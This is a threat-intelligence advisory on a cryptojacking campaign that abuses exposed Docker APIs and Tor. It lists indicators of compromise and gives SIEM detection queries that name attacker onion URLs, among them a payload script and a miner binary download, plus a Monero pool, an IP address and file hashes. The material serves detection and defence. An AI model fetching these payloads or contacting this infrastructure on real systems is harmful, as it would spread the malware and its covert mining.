Date: 06/19/2025
Severity: High
Summary
Cybercriminals have crafted a new attack method that leverages misconfigured Docker remote APIs and the Tor network to conduct covert cryptocurrency mining. Once inside containerized environments, attackers use Tor to conceal their operations while deploying crypto miners. A notable aspect of this campaign is the use of zstd, a compression tool based on the ZStandard algorithm, chosen for its efficiency. Cloud-reliant sectors—such as tech firms, financial institutions, and healthcare providers—are particularly at risk.
Indicators of Compromise (IOC) List
Domains\URLs : | http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/static/docker-init.sh http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/bot/add http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd.onion:9000/binary/system-linux-$(uname -m).zst gulf.moneroocean.stream |
IP Address : | 198.199.72.27 |
Hash : | 1bb95a02f1c12c142e4e34014412608668c56502f28520c07cad979fa8ea6455
04b307515dd8179f9c9855aa6803b333adb3e3475a0ecc688b698957f9f750ad
f185d41df90878555a0328c19b86e7e9663497384d6b3aae80cb93dbbd591740
b9b8a041ff1d71aaea1c9d353cc79f6d59ec03c781f34d731c3f00b85dc7ecd8
|
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Domains\URLs: | domainname like "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/static/docker-init.sh" or url like "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/static/docker-init.sh" or siteurl like "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/static/docker-init.sh" or domainname like "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/bot/add" or url like "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/bot/add" or siteurl like "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/bot/add" or domainname like "http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd.onion:9000/binary/system-linux-$(uname" or url like "http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd.onion:9000/binary/system-linux-$(uname" or siteurl like "http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd.onion:9000/binary/system-linux-$(uname" or domainname like "gulf.moneroocean.stream" or url like "gulf.moneroocean.stream" or siteurl like "gulf.moneroocean.stream" |
IP Address : | dstipaddress IN ("198.199.72.27") or srcipaddress IN ("198.199.72.27") |
Hash : | sha256hash IN ("1bb95a02f1c12c142e4e34014412608668c56502f28520c07cad979fa8ea6455","04b307515dd8179f9c9855aa6803b333adb3e3475a0ecc688b698957f9f750ad","f185d41df90878555a0328c19b86e7e9663497384d6b3aae80cb93dbbd591740","b9b8a041ff1d71aaea1c9d353cc79f6d59ec03c781f34d731c3f00b85dc7ecd8")
|
Reference:
https://www.trendmicro.com/en_us/research/25/f/tor-enabled-docker-exploit.html